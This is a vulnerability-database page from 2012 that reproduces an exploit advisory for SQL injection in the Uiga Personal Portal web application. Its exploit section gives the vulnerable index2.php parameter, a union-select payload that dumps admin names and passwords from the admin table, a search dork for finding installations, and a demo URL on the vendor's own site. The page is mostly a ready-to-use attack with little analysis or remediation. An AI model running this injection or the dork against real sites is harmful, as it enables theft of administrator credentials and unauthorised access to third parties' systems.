Uiga Personal Portal SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047588 漏洞类型
发布时间 2012-04-28 更新时间 2012-04-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040226
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
########################################################################################
#                                                                                      #
# Exploit Title : Uiga Personal Portal Sql Injection Vulnerability                     #
#                                                                                      #
# Author        : Secure-Land Security Team                                            #
#                                                                                      #
# Discovered By : farbodmahini                                                         #
#                                                                                      #
# Home          : Secure-Land.net                                                      #
#                                                                                      #
# Version       : All Version                                                          #
#                                                                                      #
# Vendor        : www.uiga.com                                                         #
#                                                                                      #
# Contact       : farbodmahini@yahoo.fr , farbodmahini@gmail.com                       #
#                                                                                      #
# Security Risk : High                                                                 #
#                                                                                      #
# Dork          : "Copyright uigapersonalportal.com"                                   #
#                                                                                      #
########################################################################################
#                                                                                      #
#  Expl0iT:                                                                            #
#                                                                                      #
#                                                                                      #
#  http://[TarGeT]/[Patch]/index2.php?c=1&p=[SQL]                                      #
#                                                                                      #
#  +SQL :                                                                              #
#                                                                                      #
#  -1+union+select+1,group_concat(admin_name,0x3a,admin_password),3,4,5+from+admin     #
#                                                                                      #
#                                                                                      #
#  Demo :                                                                              #
#                                                                                      #
#  http://www.uiga.com/product/demo/uigaportal/index2.php?c=29&p=[SQL*]                #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id              #
#                                                                                      #
########################################################################################